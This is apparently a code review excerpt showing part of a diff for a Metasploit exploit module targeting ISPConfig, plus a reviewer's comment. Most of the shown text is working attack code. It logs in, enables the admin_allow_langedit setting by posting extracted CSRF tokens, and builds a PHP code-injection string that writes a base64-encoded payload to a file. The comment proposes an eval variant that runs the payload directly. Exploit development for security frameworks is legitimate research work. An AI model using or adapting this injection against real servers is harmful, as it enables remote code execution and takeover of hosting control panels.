modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,353 @@
+      })
+    end
+    if res.body.match(/Username or Password wrong/i)
+      fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
+    end
+    if res.headers.fetch('Location',nil)&.include?('admin') ||
+       res.body.downcase.include?('dashboard')
+      print_good('Login successful!')
+      return true
+    end
+    print_warning('Login status unclear, attempting to continue...')
+    true
+  end
+
+  def check_langedit_permission
+    print_status('Checking if admin_allow_langedit is enabled...')
+    
+    # Try to access the language editor to see if it's accessible
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => edit_url,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200 && res.body.include?('language_edit')
+      print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
+      return true
+    elsif res && res.code == 403
+      print_warning('Language editor access denied - admin_allow_langedit may be disabled')
+      return false
+    else
+      print_warning('Could not determine language editor accessibility')
+      return false
+    end
+  end
+
+  def enable_langedit_permission
+    print_status('Attempting to enable admin_allow_langedit...')
+    
+    # Try to access the system settings page
+    settings_url = normalize_uri(target_uri.path, 'admin', 'system_config.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => settings_url,
+      'keep_cookies' => true
+    })
+    
+    unless res && res.code == 200
+      print_warning('Could not access system configuration page')
+      return false
+    end
+    
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    
+    unless csrf_id && csrf_key
+      print_warning('Could not extract CSRF tokens from system config page')
+      return false
+    end
+    
+    # Try to enable the setting
+    enable_data = {
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'admin_allow_langedit' => '1',
+      'action' => 'save'
+    }
+    
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => settings_url,
+      'vars_post' => enable_data,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200
+      print_good('Successfully enabled admin_allow_langedit')
+      return true
+    else
+      print_warning('Failed to enable admin_allow_langedit')
+      return false
+    end
+  end
+
+  def inject_payload
+    print_status('Injecting PHP payload...')
+    @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
+    b64_payload = Base64.strict_encode64(payload.encoded)
+    injection = "'];file_put_contents('#{@payload_file}',base64_decode('#{b64_payload}'));die;#"
```

Comment:
I would consider using `eval` here:
```suggestion
    injection = "'];eval(base64_decode('#{b64_payload}'));die;#"
```
This will drop the necessity of cleaning up the file and dropping the file and shorten the module.